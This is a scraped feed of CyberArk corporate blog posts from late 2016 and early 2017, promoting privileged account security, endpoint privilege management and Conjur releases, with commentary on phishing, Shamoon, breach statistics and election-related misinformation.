While we’re channeling the righteous anger at the prospect of Russian interfering with the U.S. election, could we spare some indignation at the continued failure to address basic security issues?

This isn’t a political issue. This is a problem that spans the public/private sector.

Why We Fail To Embrace Basic Security

This is a question that keeps me up at night – why? Is it an issue of awareness?

Well, a lot of these recommendations are found in long-standing compliance regulations, including HIPAA, PCI DSS, FDDC, Government Connect, FISMA, SOX and more.

On the Federal side, the U.S. GAO issued reports highlighting critical cyber vulnerabilities at the FDA, the FDIC, the IRS, the Department of Education, the FAA, and, in one case, called out 24 agencies in one report. These vulnerabilities align with the seven steps outlined above.

Private enterprise hasn’t proven to be much better (don’t worry John Podesta, you aren’t alone) – spear phishing campaigns have been used to attack major global banks, retailers and technology companies.

Is it a case of a lack of funding and spending? I’d say no. According to IDC, in 2020, organizations are expected to spend $101.6 billion on security software, services and hardware.1 We’ve seen other estimates that go even higher.

Can We Be Secure?

It’s a tough question to answer when basic cyber security practices are met with an audible sigh across all sectors. We’ve reached a point where the entire ecosystem – politicians, Federal and State government, media, security vendors and businesses – are talking at each other about security, but no one is really listening.

We’re on a cyber security carousel with no sign of it stopping – we call out the same vulnerabilities and issues again and again, yet there’s little action to actually address the fact that we’re leaving out front and back doors open to our geopolitical enemies, and anyone else who wants to come in.

1 – IDC Press Release, “Worldwide Revenue for Security Technology Forecast to Surpass $100 Billion in 2020, According to the New IDC Worldwide Semiannual Security Spending Guide,” October 12, 2016

 

 

 

 

]]>
Small and Medium-Sized Businesses Not Immune From Cyber Attacks https://www.cyberark.com/blog/small-medium-sized-businesses-not-immune-cyber-attacks/ Fri, 20 Jan 2017 18:34:19 +0000 https://www.cyberark.com/blog//

Small- and medium-sized businesses (SMBs) are the backbone of the U.S. economy. According to data available in the U.S. Small Business Administration’s Small Business Profile for 2016, SMBs with fewer than 500 employees make up 99.7 percent of all U.S. companies and employ 56.8 million workers—48 percent of the U.S. workforce.

Cyber security is as important for these companies as it is for large multinationals. SMBs also have sensitive information from employees and customers, proprietary information about products, and they often are part of a global supply chain for other companies. Every business is a target, regardless of size, and none can afford to ignore the security of its IT infrastructure.

The SMB: lots of assets, limited resources

SMBs may assume they have little to interest hackers and therefore put cyber security on the back burner. We know this isn’t true. Hospitals, for example, hold sensitive health information and have networked medical devices at risk. Unfortunately, some learned the hard way with episodes of ransomware disrupting business and damaging reputations.

It is not just a company’s own information and systems that are at risk. SMBs have been the channel in high-profile breaches that compromised millions of records. The 2015 breach of a retail company in which data from 40 million customer credit card accounts were stolen and the U.S. Office of Personnel Management breach that exposed more than 20 million employee records are believed to have originated with credentials from third-party vendors. Attackers use a weak link in the supply chain to breach a larger target; they use the compromised credentials to escalate IT privileges and use privileged accounts to compromise critical systems.

Businesses today run on IT. This makes cyber security a business necessity as well as a technology requirement. A strong security program can not only protect a business’s assets, it can also give it a competitive advantage.

Although SMBs face the same cyber security challenges as large businesses, they often have fewer resources and little in-house expertise to address these challenges. This makes it important that they get the best return on their security investments by prioritizing the right things in their security programs.

The need to know

Cloud computing and hosted services can make advanced technology affordable, and SMBs often find it cost-effective to outsource many IT functions, including security. But at the end of the day, each business is still responsible for its own security. Owners and executives need to understand the basics of cyber security, know what their service providers are doing and what questions to ask of them.

Security needs will vary depending on circumstances. Each company must understand its attack surface—vulnerable areas in the IT environment that could breached to compromise systems—and the impact of each potential breach. By assessing the impact, vulnerabilities can be prioritized, so that the cyber security program focuses on the areas needed to manage risks.

The key to protecting an IT infrastructure is privileged accounts. These accounts, if compromised, can effectively turn an intruder into an insider, giving the attacker rights to move throughout the network, escalate privileges, change settings and configurations and access data. When allocating scarce cyber security resources, privileged accounts must be identified, assessed and prioritized.

A single standard for security

An SMB IT infrastructure may not be as complex as a global enterprise, but the benefits of a layered approach to cyber security applies to all. Additionally, there are documented best practices and basic cyber hygiene practices that should be followed.

Learn more about how CyberArk can help your organization protect privileged accounts.

]]>
Noteworthy Cyber Security Statistics https://www.cyberark.com/blog/noteworthy-cyber-security-statistics/ Wed, 18 Jan 2017 18:01:41 +0000 https://www.cyberark.com/blog//

Securing privileged accounts and credentials must be at the top of the enterprise security agenda, and we’ve previously highlighted five top reasons why on CyberArk’s blog. With the launch of a new year, it’s a good time to be mindful of the lessons learned in 2016. The cyber security industry is chock-full of reports and surveys that continually provide new insights and stats. Privilege is the road most traveled in advanced attacks – that remains a constant. The sophistication of breaches, the amount of data stolen or compromised, the cost of remediation etc. continues to evolve and advance.  Here is a sampling of stats to consider:

Cost Statistics

  • In 2016, the average annual loss per company worldwide was $9.5 million.
  • In the U.S., the average annual loss per company was $17 million.
  • In the first half of 2016, 3,046,456 data records were stolen or lost every day; 126,936 data records were stolen or lost every hour; 2,116 were stolen or lost every minute and 35 were stolen or lost every second.
  • Cyber crime will cost businesses over $2 trillion by 2019.
  • The average cost of a data breach will exceed $150 million by 2020.

Attackers Will Get In, and They Will Take the Easiest Route

  • Attackers sending as few as 10 phishing emails have a 90% success rate.
  • Thirty percent of phishing emails get opened, and the #1 delivery vehicle for malware is email attachments.
  • In 93% of cases, it took attackers minutes or less to compromise systems.

Ransomware Is On the Rise

  • $209 million = FBI’s estimate of dollars lost to ransomware attacks in Q1’16.
  • $1 billion = Estimated total cost of damages related to ransomware attacks using cryptographic file-locking software in 2016.
  • Nearly 50% of organizations have been targeted with ransomware.
  • The average ransom demand is $679.

Beware the Insider Threat

  • By 2017, 41% of workers will be temps, contractors or consultants.
  • Sixty-nine percent of organizations have experienced attempted or successful data theft or corruption by corporate insiders during the last 12 months.
  • Organizations face four major insider threats: The Exploited Insider, the External “Insider,” the Malicious Insider and the Unintentional Insider.

What does your organization have in place to mitigate the risks of a cyber attack? Have you tested your incident response plan?  How’s your cyber hygiene – patching, rotating and isolating sessions? How many privileged accounts does your organization have?  This is a figure you should know. Now is the time to find out. Use CyberArk’s free discovery and audit tool to discover privileged accounts on-premises and in the cloud. Learn more.

]]>
Get Cyber Security Right in 2017: Prioritize Privilege https://www.cyberark.com/blog/get-cyber-security-right-2017-prioritize-privilege/ Thu, 12 Jan 2017 15:31:14 +0000 https://www.cyberark.com/blog//

Prudent organizations understand the need to have a cyber security program in place to protect assets, but it can be difficult to determine which investments will provide the best business value when making the budget case to C-level executives. This is true whether establishing a new security program or updating an existing one.

When making security plans for 2017, consider a risk-based approach focused on the paths that attackers often take to access the most critical assets in an organization. There are plenty of industry reports and government recommendations flagging the importance of securing privileged accounts and credentials—take your pick. The role they play in advanced attacks is well documented.

Privileged accounts are the gateway to your organization’s assets

Privileged accounts give access to a wide range of assets, often with authority to make changes in settings and configurations. This makes privileged accounts the gateway to your assets. The credentials for these accounts—including cryptographic keys, passwords and hashes—are the keys to these gateways; they allow attackers who have breached the perimeter to travel horizontally and vertically throughout a network to reach and exploit their desired targets.

CyberArk research has found that, on average, 40 percent of the Windows hosts on a given network, if compromised, would provide an attacker credentials that would facilitate complete compromise of the vast majority of the other Windows hosts on that network—whether directly or through a series of compromises. Although 100 percent security of your network is not feasible, denying an intruder access to privileged credentials is a critical first step in reducing risk to your most valuable assets.

Prioritizing the security of your privileged accounts is not only a good security plan, it is also a good business plan.

Making the business case for privileged account security

Most C-level executives are not hands-on in IT, but they understand the need to protect an organization’s assets, brand and reputation. Effective cyber security is necessary because if you lose administrative control of your infrastructure, you’ve lost control of your business. Your infrastructure no longer is working for you; it’s working for the intruder.

When making the case for prioritizing privileged account security, consider the following points:

  • Metrics: Establish success metrics for your cyber security program and show the progress made in improving your organizations’ security posture.
    • Discover the privileged accounts on your network and identify what assets they have access to.
    • Prioritize these accounts according to the risks they represent and create a tiered plan for securing them over time.
    • Document and report progress in securing the accounts and their credentials.
  • Demonstrate value: Reduce your organization’s exposure to intruders and show the value this provides to the overall cyber security program.
    • Identify the areas of greatest business impact (such as most sensitive operations, most valuable lines of business, markets with greatest growth potential, etc.)
    • Define the attack surface of these areas based on their exposure through privileged accounts.
    • Demonstrate the reduction of the attack surface through progress in securing the accounts.

Prioritize privilege now

An effective cyber security program is a must for your organization, and the best return on your investment comes from protecting the privileged accounts and credentials that intruders exploit. If you don’t do it now, you will have to do it after an intruder has breached your perimeter. Why wait?

Here are the top five reasons to prioritize privilege account security:

  1. Privilege is the road most traveled by attackers moving through your network.
  2. Privileged accounts represent the express lane to your domain controllers, giving control of the infrastructure.
  3. Your security systems need to be secure; securing privileged accounts protects them.
  4. It’s a single solution to protect against both insider threats and external attackers.
  5. Securing privileged accounts is the first action you will have to take following a breach.

Take the first step

Make sure you know your network better than attackers. Take inventory of your privileged accounts. CyberArk Discovery & Audit™ (DNA) is a free tool available to help organizations discover privileged accounts both on-premises and in the cloud. Use the results to assess security risks, identify accounts with local administrator rights, and identify machines vulnerable to credential theft. Prioritizing the risks lets you begin improving security right away.

]]>
Misinformation and the Loss of Public Trust https://www.cyberark.com/blog/misinformation-loss-public-trust/ Thu, 29 Dec 2016 18:17:18 +0000 https://www.cyberark.com/blog//

Misinformation—and the misuse of information—came to the fore of public attention during the 2016 U.S. presidential election. Exactly who was behind the well-publicized hackings, leaks and fake news stories, and their impact, remains under investigation and might not be known for months, if ever. However, what is clear is that the ability to use misinformation for political gain or otherwise will continue to be a significant cyber security issue in 2017 and beyond. In fact, concerns have already been raised about similar attacks on trust in connection with the German Parliament elections in 2017.

Ensuring the integrity of data and controlling its use is critical to maintaining trust not only in organizations, but in public institutions and leaders’ ability to make decisions.

It’s Not New

The use or control of information to sway public opinion or gain political or military advantage is not new. In a Washington Post opinion piece, John Maxwell Hamilton of the Woodrow Wilson Center for International Scholars dated the birth of information warfare to the opening days of the First World War when the British cut German undersea cables to disrupt communications. The theft and manipulation of information for espionage and propaganda is as old as warfare itself. The use of propaganda continues today.

What is new in information warfare is the proliferation of digital data that can be remotely accessed and manipulated as well as disseminated globally. Data has become not only a resource and an asset, but also a weapon as demonstrated during the presidential campaign with the release of stolen e-mails.

That and the proliferation of fake “news” stories that often outperformed real news in social media. According to a survey by the Pew Research Center, 64 percent say fabricated news stories cause a great deal of confusion about the basic facts of current issues and events. In the same survey, 23 percent said they had shared fake stories – either knowingly or not.

This raises questions about the responsibility for protecting the integrity of data.

Manipulating the Data

Most of us (according to the Pew survey) are confident we can spot phony news. Sifting the real from the false is not always easy, however. A story about a love triangle with Elvis can be easily dismissed, but an article that shaves numbers off a political poll or the selective release of documents without context are more difficult to evaluate. Manipulating real data can be more insidious than making something of whole cloth.

A challenge of digital data is that it can be altered in ways that are difficult to detect. Data can be altered in servers and databases so that its owners are not even aware of the changes. When released or accessed under normal circumstances, this altered information can appear to be credible if available from a “trusted” source. Audio and video files can also be edited to deceive. Seeing and hearing are no longer believing, and as a result, trusted sources lose integrity.

The internet has blurred the distinction between publishers and readers/viewers. Phony or doctored information can be distributed globally at little cost and amplified through social media. Identifying the original source of falsified data or information can be difficult.

Defending our institutions

Defending ourselves and our institutions against misinformation requires a combination of personal skills and technology.

People must be media and information literate. Whether a baby boomer or a digital native, it is increasingly important to have the ability to evaluate the credibility of information and its sources. This requires a mix of critical thinking and enough knowledge/healthy skepticism to question things that just do not seem to be right. Understanding the nature of digital data and the challenges of cyber security contribute to these skills.

The creators, owners and distributors of data also have an obligation to integrity. Reputations are at stake, and the integrity of institutions could be damaged through a loss of public trust and confidence.

We have already written about the importance of data integrity as a part of a complete cyber security program. Basic practices such as encrypting data can help protect it, and hashing can help assure it has not been altered. Monitoring network activity and controlling access to privileged accounts that have permission to make changes in data also are critical.

Instilling trust in the data relied on to make decisions and protect citizens must be part of advanced cyber security strategies. Raising visibility of this challenge and spurring ongoing discussions will help maintain global awareness, even as elections fade from the front page.

 

 

]]>
Conjur Named a Top Cloud Security Solution Provider by Enterprise Security Magazine https://www.cyberark.com/blog/conjur-named-a-top-cloud-security-solution-provider-by-enterprise-security-magazine/ Tue, 20 Dec 2016 16:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-named-a-top-cloud-security-solution-provider-by-enterprise-security-magazine/  

WALTHAM, Mass., Dec. 20, 2016—Conjur, a trust management platform for the cloud, today announced that it has been named to Enterprise Security’s “Top 10 Cloud Security Solution Providers 2016” list. The award recognizes Conjur for its innovative trust management platform, which empowers DevSecOps teams to automatically implement secrets and access management policy for cloud infrastructure.“It’s an honor to be included on this year’s list of top cloud security providers,” said Elizabeth Lawler, CEO and co-founder of Conjur. “Security is top of mind for today’s organizations as they increasingly move sensitive workloads to the cloud. Conjur’s trust management platform helps these organizations balance their goal of adopting cloud computing with their need to ensure security, so they can move forward to embrace today’s infrastructure and tools with confidence.”

Enterprise Sec Mag Top 10 Award.jpg

Conjur was hand-picked by a panel of technology leaders to appear on the annual list. As profiled by Enterprise Security, “Conjur is transforming the way enterprises manage security as they embrace the cloud as a core component of their IT strategy. The cybersecurity company is making it easy for organizations to deploy whatever devops tools they want in hybrid and multi-cloud environments while still maintaining rigorous security controls over their dynamic infrastructure.”

Read Conjur’s full profile from the December 15 issue of Enterprise Security here.


About Conjur

Conjur delivers a trust forward software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur’s security orchestration software allows users to leverage the business systems that they already trust as they move forward with their cloud transformation initiatives by automating machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy. Conjur is headquartered in Waltham, Mass., and is backed by Amplify Ventures, Avalon Partners and Koa Labs. For more information, please visit www.conjur.net or follow @conjurinc on Twitter.


About Enterprise Security

Enterprise Security Magazine is a technology magazine that gives information about the security solutions, which helps organizations to get adapted to the radical changes that are taking place in their information security infrastructure. For more info, visit: http://www.enterprisesecuritymag.com/


Media Contact:
Lesley Sullivan
LaunchSquad
617-945-1915
conjur@launchsquad.com

 

]]>
CyberArk Privileged Account Security Includes Integrations with IT Ticket Management https://www.cyberark.com/blog/cyberark-privileged-account-security-includes-integrations-ticket-management/ Tue, 20 Dec 2016 14:30:06 +0000 https://www.cyberark.com/blog//

Need a new software program installed on your laptop? Call the help desk.  Can’t get the VPN to work? Call the help desk. Spilled water on your computer? Call the help desk.

Depending on the size of the organization, an IT help desk can receive dozens, hundreds or even thousands of requests daily, so it’s no surprise that IT teams rely on ticket management solutions to address the workload, track cases and collaborate on tricky problems.

Ingrained within the IT department of many enterprise organizations, IT ticket management solutions typically track both the help desk’s response to standard user requests as well as administrative access to IT infrastructure when backend systems require attention. In effect, IT ticket management systems often become a single point of truth not only for the status of IT systems, but also for who is accessing those systems to fix reported issues.

And – you guessed it – the “who” is privileged users. To maintain and repair IT systems and applications, privileged users need access to privileged accounts. Yet, privileged accounts in the wrong hands, such as a malicious or careless user, could do serious damage. By integrating IT ticket management solutions with privileged account security solutions, organizations can effectively bridge the gap between authorization and account security, thus limiting exposure to advanced and insider attacks while extending existing access control workflows to new solutions. With an integrated solution, organizations are able to maintain a single point of truth while layering in proactive security controls to prevent the unauthorized re-use and abuse of privilege account credentials.

To help organizations reap the security and operational benefits of tightly integrated solutions, the CyberArk Privileged Account Security Solution now includes out-of-the-box integrations with BMC Remedy and ServiceNow IT Service Management. In addition to securing and managing the credentials used by privileged users, the CyberArk Privileged Account Security Solution can also protect access to the administrative consoles of IT ticket management systems, helping security teams ensure that the individuals entrusted with managing administrative access throughout the environment can, themselves, be trusted.

These new integrations are part of an on-going effort by CyberArk to bring together leading technology vendors to help shared customers solve complex security challenges in an easier, more cost-effective way. Read about the C3 Alliance program and learn about CyberArk supported solutions and technology partnerships.

]]>
Technology Spotlight Examines the Impact of Securing Privileged Credentials on the Endpoint https://www.cyberark.com/blog/technology-spotlight-examines-impact-securing-privileged-credentials-endpoint/ Thu, 15 Dec 2016 14:51:10 +0000 https://www.cyberark.com/blog//

A new Technology Spotlight from independent analyst firm IDC highlights steps for securing privileged credentials as part of a proactive approach to hardening the endpoint against cyber attacks. Security and desktop operations teams will gain insight into the foundational elements of a comprehensive cyber security strategy to reduce the attack surface that includes endpoint protection. The Technology Spotlight, “Key Considerations for Securing Privilege on the Endpoint,”1 is sponsored by CyberArk.

The paper highlights the findings of data breach investigations that uncovered significant enterprise security risks associated with the exploitation of local administrator rights and account credential theft, and where existing, reactive endpoint security solutions can fall short in being able to detect and contain potential threats.

According to IDC, “the endpoint continues to be the focal point where criminals clash with IT defenders on a daily basis. Unfortunately, most organizations continue to invest in sophisticated malware detection technology without addressing endpoint security best practices. This leaves significant gaps that enable attackers to evade detection.”

Laptops and workstations are the most frequently targeted attack vector used by malicious actors to gain initial access to the corporate network, making endpoint security a critical factor in an organization’s overall risk posture. Once an attacker gains access to an endpoint and a local administrator account, privileged credentials are easily elevated to achieve lateral movement and full network takeover. Still, 62 percent of organizations have not yet taken steps to remove local administrator rights from the endpoint.

The paper explores how organizations can adopt endpoint security best practices, such as removing local administrator rights from the endpoint and implementing application controls, like greylisting, to delay and deter advanced threats.  In addition, IDC recommends organizations:Establish a formal patch management program to support a regular patching cycle for endpoint systems;

  • Implement strict password and account management policies, such as one-time use credentials, and enforcement mechanisms;
  • Adopt continuous monitoring and analytics solutions to detect and block credential theft at the endpoint in real-time.

CyberArk Endpoint Privilege Manager, available as part of the CyberArk Privileged Account Security Solution, protects against advanced threats that exploit privileged credentials by interlocking three core capabilities: privilege management, application control and new credential theft detection and blocking to stop and contain damaging attacks at the endpoint.

CyberArk Endpoint Privilege Manager, previously CyberArk Viewfinity, delivers an additional layer of proactive protection through the hardening of the endpoint by removing local administrator credentials, reducing risk while alleviating pressure on help desk support, and enabling flexible application control, allowing organizations to prevent malicious applications from executing and utilize greylisting to run unknown applications in a restricted mode.

The Technology Spotlight, “Key Considerations for Securing Privilege on the Endpoint,” is available now for download.

 

1 – IDC Technology Spotlight, sponsored by CyberArk, “Key Considerations for Securing Privilege on the Endpoint,” December 2016, IDC # US41694116

 

]]>
The Most Fundamental Endpoint Security Problem is a Privilege Problem https://www.cyberark.com/blog/fundamental-endpoint-security-problem-privilege-problem/ Tue, 13 Dec 2016 16:40:51 +0000 https://www.cyberark.com/blog//

Privilege escalation is at the center of the cyber attack cycle. Why? Because attackers need the credentials of an insider, and administrative credentials give them the power to move laterally throughout the data center, to access high value servers and to take over domain controllers. Organizations now realize that securing privilege access is the first step they need to take to protect their organization from damaging cyber attacks, but it’s important to remember that privilege access is a security challenge across the entire IT infrastructure – not just the data center.

Privilege accounts exist in EVERY piece of technology in the organization. Every server, every database, every application including SaaS, every domain controller, every hypervisor, and of course, every endpoint. Securing privileged access on the endpoint is just as important as securing privileged access to servers and domain controllers.

Ownership is Privilege

There are a number of reasons why privilege security at the endpoint is critical. I’ll keep it short and focus on one, very important concept – ownership of the endpoint. Privileged access provides a user with total control over the endpoint including the ability to decide who can do what on the machine. If control of the machine remains with a trusted systems administrator, the company controls it. The company retains “ownership” of the device. Once an attacker gains privileged access to an endpoint, s/he has total control over that machine. Ownership now belongs to the attacker. As a result, the attacker can decide who can access the machine, create and modify user accounts, change configuration settings, disable/uninstall anti-virus, install malware, reset local passwords, access data that belongs to others etc.

Microsoft’s Security Response Center’s 10 Immutable Laws of Security state this very clearly. There are multiple “laws” that articulate the need to secure admin credentials, but read #6 carefully:

A computer is only as secure as the administrator is trustworthy

“Every computer must have an administrator: someone who can install software, configure the operating system, add and manage user accounts, establish security policies, and handle all the other management tasks associated with keeping a computer up and running. By definition, these tasks require that the individual have control over the computer. This puts the administrator in a position of unequalled power.”

This also covers the authorized administrators that make mistakes or go rogue, as well as any unauthorized user or executable using an administrative credential.

Knowing this fact, it’s a mystery to me why organizations continue to add on layers of endpoint controls and detection without securing admin accounts. This most basic, but important, step in security control is missing.

Prioritize Privileged Account Security

Organizations have spent billions of dollars trying to protect their organizations from cyber attacks.Yet the number of attacks continues to grow. Industry benchmarks show cyber crimes cost an enterprise organization $15 million per year on average, with the overwhelming majority of attacks originating on the endpoint.

Attackers know that user log-ins are far easier points of infiltration than network or software exploits. Organizations try to train their employees not to click on malicious email, but phishing attempts persist and are increasingly sophisticated. Raising the bar for security literacy is a worthy endeavor in the digital age of business, but education will not contain an attack at the endpoint.

There will always be a new “threat du jour.” Taking a layered approach to security is smart, but there is no silver bullet. For this reason, it’s important to have measures in place to contain the damage of a breach and to mitigate risks. Remember the common denominator across every tool in your security toolbox: privileged accounts. For this reason and others, protecting privilege must be a priority.

CyberArk has focused on privileged account security for more than a decade, and we know what damage can be done when an attacker has access to privileged credentials. Some companies have learned the hard way – and locking down privileged credentials was among the first actions taken during remediation.

We continuously innovate our products to address market needs, and we recently introduced CyberArk Endpoint Privilege Manager to help organizations contain attackers early in the lifecycle by interlocking three core capabilities: privilege management, application control and new targeted credential theft detection. The goal is to stop and contain damaging attacks at the endpoint. Instead of adding layers of preventative endpoint security controls on a weak foundation, we offer a different, proactive approach.

We invite you to learn more here.

]]>
Conjur 4.8 Released Delivering Enterprise-Scale Deployment Capabilities https://www.cyberark.com/blog/conjur-4-8-released-delivering-enterprise-scale-deployment-capabilities/ Wed, 07 Dec 2016 16:41:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-4-8-released-delivering-enterprise-scale-deployment-capabilities/  

We’re pleased to announce the immediate availability of Conjur 4.8. Over the past couple of years as Conjur has been deployed broadly with large enterprise customers, we have had a number of requests for features to make it easier for them to manage their expanded use of the software. This latest release delivers a set of capabilities that respond to these need and will further enable our customers and prospects to deploy Conjur broadly and manage it more easily.


What’s new:

Improved High Availability

The Conjur Trust Management Platform is a critical piece of our customers’ cybersecurity infrastructure, and they require that their Conjur environment be highly-available, fault-tolerant and scalable to their needs. To that end we have included a number of updates in v4.8.0 that make it easier to launch and maintain Conjur clusters.

Release1.png

For customers running on AWS, we now provide CloudFormation templates to create the infrastructure needed. Server health checks now include information about free disk space and inodes. The workflow for bringing your own certificates and private keys has been improved. Finally, a load balancer is no longer needed for cluster setup.

Conjur Cluster Health Monitoring

We’ve also added a Cluster Dashboard to the UI. This dashboard shows the role and status of every node in your Conjur cluster so that you can monitor the health of the distributed Conjur platform through a single console.

Release2.png

Improved LDAP Sync Workflow

We introduced LDAP Sync in the v4.7.0 release. Most large companies have an existing LDAP or Active Directory environment. LDAP Sync synchronizes users and groups from LDAP/AD with Conjur at a user-specified interval. A lot of work has gone into LDAP Sync for the v4.8.0 release to make it faster, easier to use, and more reliable.

The new workflow for LDAP Sync starts with configuring your LDAP/AD connection and filters in the Conjur UI.

Release3.png

After successfully configuring and verifying LDAP Sync settings, a Conjur Policy file is generated that can be loaded into Conjur.

---
- !policy
  id: ad-acme
  body:
   - !user
     id: Administrator
     annotations:
ldap-sync/source: ad-ec2
ldap-sync/upstream-dn: CN=Administrator,CN=Users,DC=acme,DC=org
   - !user
     id: Guest
     annotations:
ldap-sync/source: ad-ec2
ldap-sync/upstream-dn: CN=Guest,CN=Users,DC=acme,DC=org

The policy can now be loaded into Conjur. Major benefits of using Conjur Policy in the new LDAP Sync workflow include increased sync speeds, ability to handle very large LDAP/AD environments, and familiar tooling for Conjur users.

Integrated Conjur UI

Until now separate containers were required to deploy the Conjur appliance and the Conjur UI. We are pleased to announce that the Conjur UI is now integrated into the Conjur appliance image. This means that you can now open the HTTPS endpoint of any node in your Conjur cluster to view the Conjur UI. Deploying a separate Conjur UI container is no longer necessary.


This was an overview of the major new updates for Conjur v4.8.0. This release also contains many other improvements and bugfixes. See the full release notes for a detailed list of all updates in this release.  Existing customers can contact support@conjur.net to upgrade.

 

]]>
Phishing – A Threat for Sure, But the Biggest We Face? Not So Fast! https://www.cyberark.com/blog/phishing-threat-sure-biggest-face-not-fast/ Mon, 05 Dec 2016 15:00:13 +0000 https://www.cyberark.com/blog//

With the recent reports of email hacking of the DNC and Clinton campaign, it’s understandable that phishing has its moment in the cyber security spotlight.

According to a recent Fortune article, Homeland Security Secretary Jeh Johnson, noted, “The most devastating attacks by the most sophisticated attackers almost always begin with the simple act of spear-phishing.”

Phishing, when used as a tactic, is the first of multiple steps in a cyber attack, and by itself, inflicts no harm. It allows an attacker to penetrate perimeter defenses and set up a base of operation inside the network, but at the end of the phishing stage of an attack, no damage has been done. Nothing has been stolen. No IT systems have sustained any damage. It’s simply a point of entry.

Of course it is always better to keep an attacker outside of your network if you can. But, recognizing the difficulty of that, many companies today operate as if a breach has already (or will) occurred. Just because an attacker got inside doesn’t mean they have done any damage. To do that, the attacker needs credentials and the ability to move laterally, which requires additional steps.

To access all of a user’s emails, attackers still need to steal the user’s email credentials. To execute a ransomware attack, the bad guys need to install and execute a malicious application.  To access a server with tens of thousands of credit card accounts, they need to get beyond their initial base of operation, move laterally across the network, and capture administrative credentials that provide the necessary access to the credit card data.

The same Fortune article noted above quotes Manhattan District Attorney Cyrus Vance:  “Phishing—mundane as it is—is the biggest threat we face and need to tackle.”

Mundane? Yes, because organizations should practice basic standards of cyber hygiene and there are proven ways to stop an attacker from advancing after a user has been phished. In fact, this is where real security strategies need to kick in. Least privilege controls on endpoints can be very effective at preventing the installation of ransomware and other malicious applications. Privileged account security can prevent attackers from accessing the credentials necessary to gain access to servers, domain controllers or industrial control systems.

With security controls readily available to stop an attack from advancing, it’s hard for me to agree that phishing is the biggest threat we need to tackle. For the record, my vote goes to protecting our energy grid and water supply.

But, if phishing has the C-Suite and others engaged in a dialogue about cyber security, then consider it a teachable moment. Explain what controls your organization has in place to contain a breach and break the attack chain. If your organization hasn’t reached table stakes, identify the resources and support needed to raise the bar on your security controls. Ultimately, privileged accounts need to be managed and protected. Make it your priority today.

 

]]>
Shamoon Attack Reinforces Risks of Privileged Credential Compromise https://www.cyberark.com/blog/shamoon-attack-reinforces-risks-privileged-credential-compromise/ Thu, 01 Dec 2016 17:06:20 +0000 https://www.cyberark.com/blog//

Malware like Shamoon is analogous to finding an unexploded WWII bomb in the ground. It’s been seemingly dormant for years, but when uncovered, it remains incredibly dangerous with the potential to devastate. Agile cyber attackers have become expert at reconstituting old weaponry for new attacks – we can expect this trend to continue throughout 2017.

While it’s natural to focus on the devastation malware like this can cause, understanding the pathway the malware had to travel is key to mitigation. According the reports, the malware contained embedded credentials that allowed the malware to surreptitiously move throughout the network and plant its logic bombs. In this case, the attack was likely initiated using a worm, which is how Shamoon operated historically. Propagation can occur by accessing shares in the network or through other remote access, using stolen credentials. Another possible way to gain this access network-wide is through group policy object (GPO) configuration from the Domain Controller that is distributed to domain-connected machines.

Frustratingly, this pattern of privileged credential compromise continues to be repeated – consider attacks like the ones impacting the Ukraine power grid, Bangladesh Bank, The Sands Hotel and more. Hijacked administrator credentials enable attackers to enter the network undetected and they continue to elevate those privileges until they find a landing point to inflict maximum damage.

When Shamoon first wreaked havoc on Saudi Aramco in 2012, ICS-CERT immediately issued strategic mitigation steps to specifically prevent Shamoon-based attacks. The mitigation strategies highlighted the importance of controlling access and management of privileged accounts. This is very similar to the alert the FBI recently issued that prioritized privileged credential protection.

These steps are known best practices in the security industry. The reality we face is that while we pay lip service to enacting security best practices, bad habits persist. Our recent research shows that as many as 40% of organizations still store privileged and admin passwords in word docs or spreadsheets. Failing to secure these accounts is an open door to attackers to unleash their malware across a network.

We can expect more attacks that reconstitute old malware, but we can’t persist in the same security mindset. We need to assume cyber attackers are already on the network and planning attacks with increasingly malicious intent. By shutting down the privileged pathway of malware like Shamoon, organizations can build virtual blast chambers that contain the damage a ‘digital bomb’ can cause.

 

]]>
Application Credentials: The Hidden Attack Pathway into Your Organization https://www.cyberark.com/blog/application-credentials-hidden-attack-pathway-organization/ Thu, 01 Dec 2016 14:21:40 +0000 https://www.cyberark.com/blog//

Today, it’s well-understood that credentials belonging to IT administrators, business users, partners and others with high levels of network access are critical for gaining unauthorized access to key systems, and ultimately, the heart of the enterprise. As we’ve explored previously, too many organizations continue to equate privileged credentials with IT administrators alone. The reality is that privileged access is not limited to users with a “heart beat.”

Every day, countless applications across the enterprise use privileged credentials to connect to sensitive resources. Sought after and exploited by cyber attackers when left unprotected, these application credentials include SSH keys and hard-coded, embedded passwords. Many privileged credentials accessed by applications are often not well managed, secured or even tracked for a number of reasons. Though IT security teams increasingly realize the importance of shoring up the security of privileged credentials used by applications, the process can understandably seem to be complex, time-consuming and overwhelming.

The key to implementing an effective privileged account security program for applications is to create a comprehensive, long-term plan, but to start small. Tackling the initiative piece-by-piece will help your IT security team to mitigate risk, build repeatable processes and demonstrate “quick wins” that will help garner further support from key stakeholders.

To do this, it’s important to understand that not all applications are made equally and most enterprise applications can be classified into two distinct tiers based on both their availability level and risk level:

  • Tier 1: Business/mission-critical, high availability applications, such as consumer-facing web applications, are integral to an organization’s operations, and if they fail they can cause significant financial or reputational damage. They often enable access to an organization’s most sensitive resources, and as such, need to be protected and available 24x7x365.
  • Tier 2: These applications are also critical to an organization’s operations, yet do not need to be “always on.” For example, scripts or applications that perform simple, often automated tasks, such as running a scheduled backup script on Windows.

CyberArk Application Identity ManagerTM offers a variety of flexible deployment options to protect privileged credentials linked to each application tier. This gives organizations the ability to approach privileged account security initiatives in manageable pieces—beginning with a specific kind of application, such as Commercial Off the Shelf (COTS) applications or J2EE application servers (such as IBM, WebSphere, Oracle, Weblogic, JBoss and Tomcat), then scaling over time as program milestones are successfully completed.

Our recent eBook, “An Attack Pathway into Your Organization? There’s an App for That,” explores these deployment options in detail, while offering actionable recommendations for improving privileged credential security, management and compliance. We invite you to download the eBook here.

]]>
With ATM Attacks in Taiwan, History Repeats…Again https://www.cyberark.com/blog/atm-attacks-taiwan-history-repeats/ Wed, 30 Nov 2016 15:22:51 +0000 https://www.cyberark.com/blog//

